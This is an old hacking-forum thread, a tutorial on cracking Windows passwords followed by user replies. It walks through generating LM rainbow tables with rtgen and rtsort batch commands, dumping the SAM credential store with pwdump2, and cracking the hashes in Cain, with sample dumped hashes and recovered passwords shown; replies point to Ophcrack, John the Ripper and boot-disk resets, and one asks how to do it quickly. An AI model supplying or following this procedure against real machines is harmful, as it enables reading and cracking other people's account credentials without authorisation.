[How to] Cracking Windows Passwords

[Biovore]

------------------------------
CRACKING WINDOWS PASSWORDS
------------------------------

Biovore -- http://www.rorta.net


Well, after much umming and aahing, i bring to you, the first part of hacking windows passwords of upto 14 characters in a few seconds.

------------------------------
Tool kit:
------------------------------

Rainbow Crack
pwdump2
Cain & able

------------------------------
Cliff steps:
------------------------------

1) Generate rainbow tables

2) Dump sam and system file

3) Use cain to crack password via rainbow tables

Yes, it is THAT simple.

------------------------------
MORE DETAIL:
------------------------------

Rainbow tables, what are they? Well think of them as large files of random passwords already computed.

you can read more here:

http://www.antsight.com/zsl/rainbowcrack/

Anyways fire up rtgen and get some tables....

rtgen is a program which will generate rainbow chains, which then combine to make a rainbow table.

here are the bat files for you lazy people

Code:

rem config 1
rtgen lm alpha 1 7 0 2100 8000000 all
rtgen lm alpha 1 7 1 2100 8000000 all
rtgen lm alpha 1 7 2 2100 8000000 all
rtgen lm alpha 1 7 3 2100 8000000 all
rtgen lm alpha 1 7 4 2100 8000000 all

and

Code:

rem config 2
rtgen lm alpha-numeric 1 7 0 2400 40000000 all
rtgen lm alpha-numeric 1 7 1 2400 40000000 all
rtgen lm alpha-numeric 1 7 2 2400 40000000 all
rtgen lm alpha-numeric 1 7 3 2400 40000000 all
rtgen lm alpha-numeric 1 7 4 2400 40000000 all

config 1 should take 12 - 24hrs to generate depending on your machine, maybe even 36hrs. it will use 610mb of disk space

Config 2 should take around 5 days to generate and use 3 gigs of hdd space

commming soon will be config 3 which will take 18 gigs of space... :O

So, config 1 will be able to crack 99.904% of passwords that ONLY have alpha characters in a few seconds. I will be using these

tables for the tut, as i imagine most of you dont want to spend 5 days on rtgen.

Also, you will need to sort the files to make them more efficent

this is done via rtsort

Code:

rem config 1
rtsort lm_alpha#1-7_0_2100x8000000_all.rt
rtsort lm_alpha#1-7_1_2100x8000000_all.rt
rtsort lm_alpha#1-7_2_2100x8000000_all.rt
rtsort lm_alpha#1-7_3_2100x8000000_all.rt
rtsort lm_alpha#1-7_4_2100x8000000_all.rt

Code:

rem config 2
lm_alpha-numeric#1-7_0_2400x40000000_all.rt
lm_alpha-numeric#1-7_1_2400x40000000_all.rt
lm_alpha-numeric#1-7_2_2400x40000000_all.rt
lm_alpha-numeric#1-7_3_2400x40000000_all.rt
lm_alpha-numeric#1-7_4_2400x40000000_all.rt

So you have wasted some space, and you go, hmmm whats next.

Well we are going to dump the SAM to a file.

The SAM file is a depository for the user names and password hashes for every account on the local machine, or domain if it is a

domain controller, that wasnt too hard was it?

To do this, we are going to use a program called pwdump2

run the exe in cmd and issue this code:

pwdump2 > pass.txt

what that will do is redirect output to a file names pass.txt in the same folder as the program.

open it up: this is what it will look like:

Code:

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:569fbcadc4ce9874da275e3dd3b3773c:fdcc6716e6ec3388bc0694086538e4f2:::
RORTA:1008:c036412e27c931e297b0668eeca3a3a4:fe31056a1f67c9e149d60851d36d39fe:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:54b4144f22141ce78c44cb2e5b38b852:::
__vmware_user__:1005:aad3b435b51404eeaad3b435b51404ee:839a847853f36b5a0bae94bca6992ea6:::

as you can see i have removed my account and the admin one so.... note the rorta one :P

now what?

well we will fire up cain

in cain you will see a tab that says cracking, goto that one...

now on the left most column you can see a nt and ntlm hashes tab click that one

now hit the big plus sign

select import

open the pass.txt in your pwdump2 folder

highlight the accounts you want to crack and right click

select Cryptinalasys attack

press add table and then import all your rainbow tables...

then START! and wait 10 seconds....

Code:

Reading lm_alpha#1-7_0_2100x8000000_all.rt ...
... 128000000 bytes read in: 5.00 s
Verifying the file... (OK)
Searching for 2 hashes...
Plaintext of c036412e27c931e2 is RORTARU
Plaintext of 97b0668eeca3a3a4 is LES
Cryptanalysis time: 4.44 s

Username	Password
------------------------------------------
RORTA         	RORTARULES

Lets have a little look at the output here:

As you can see 2 hashes were loaded, thats because, LM can only store 7 char in each hash the pass was 10 char so 7 in 1 hash

and 3 in the other...

this time, i went to a website that generated and i quote "secure passwords", well lets see how secure it is now....

Code:

Reading lm_alpha#1-7_0_2100x8000000_all.rt ...
... 128000000 bytes read in: 4.42 s
Verifying the file... (OK)
Searching for 2 hashes...
Plaintext of 4dcb7b0d5742450d is RLUPRI
Cryptanalysis time: 5.02 s

Reading lm_alpha#1-7_1_2100x8000000_all.rt ...
... 128000000 bytes read in: 4.66 s
Verifying the file... (OK)
Searching for 1 hash...
Cryptanalysis time: 3.91 s

Reading lm_alpha#1-7_2_2100x8000000_all.rt ...
... 128000000 bytes read in: 5.19 s
Verifying the file... (OK)
Searching for 1 hash...
Plaintext of e6ea64de82fd05a1 is WIAXOED
Cryptanalysis time: 0.49 s

Username	Password
------------------------------------------
secure        	WIAXOEDRLUPRI

doesnt seam overly secure to me....


Stickied by Synch, k thx.

[Dr_Zaius]

Excellent, I've always wondering about generating rainbow tables, its a much better option than bruteforcing the hash.

[Synchronium]

But that's almost what a rainbow table is.

Every possible combination of chars (up to a limit). Only with a table, you store these generated strings and query the table rather than generating and trying the string on the fly.

This way means you create all possible combos once, then refer to them for each hash rather than recreating and retrying every one of them for each hash.

[Biovore]

Time memory trade off is a different technique to brute forcing. IF you want to get perdantic about it, all password cracking is taking a source hash and seeing if it matches the cypher hash. Weather it is generated in real time, stored in a table, or a dictonary.

With Oechslin's method of pre computation uses less requests and less generated hashes than what Hellman's eariler method suggested, which was aimed more to storing a brute force attack for later. There have been some suggestions that to store all the hashes via Hellmans method, it would take around a terrabyte or so. Using Oechslins method the size is arounf 120gb of space.

Get use to precomputaion, its here to stay, with power and plentiful storage space, anything is possible

[Synchronium]

Couldn't agree more.

In fact, I made a PHP bot that worked with MD5 to look up a rainbow table (albeit a small one) for use in IRC.

Also allowed people to say a word to it and it'd return the MD5 hash to them of that word and quietly add it to the database, allowing it to grow and grow.

Since I have a 100gb of space lying around, might be worth setting it up again.

[The Butcher]

I have heard of the time memory trade off technique before, and after reading this topic I thought I'd give it a try. Everyting work like it was supposed to, except for pwdump2. Every time I try to run it from CMD it says pwdump2 is not reconized as an internal command opperable batch file or program. And when I click on the pwdump icon it just flashes up and dissapears. Any help would be greatly appreciated. thavnks

[Synchronium]

Navigate to the folder it's in...

For example, John The Ripper, another cracker, runs with the command "john" through console, but to actually get it to work I have to:

Code:

cd "C:\Program Files\JohnTheRipper\john-16\run"

Which takes me to that directory. Using the command "john" in console now works fine.

I imagine you have a similar problem.

[Wally]

great.......now how would i do that in 75 minutes or less?

[Shorty Tubbs]

how about pwdump2 then john the ripper?

[an0nym0us]

Ophcrack!

[Darkshadow666]

Cool, rainbow keys go pretty fast on a quad core processor.

[jbockmon]

wouldn't it be easier to just download the OPHcrack liveCD ISO from sourceforge and burn it onto a disk and then restart ur PC and let it boot into linux and crack the passwd's

[Marty_Freak]

my friend had his laptop give him some troubles and reset his password (to who knows what), and his dad gave him a disk and he was able to boot it up from the disk and reset it to whatever he wanted. now his dad works for *unnamed computer corp.* and he had it all set and ready to go within 30 seconds with the disk. ill see if i can find out what its called or if i can get a copy to upload it. i used cain before, and not a big fan.

[hellsgateman]

where do i get the software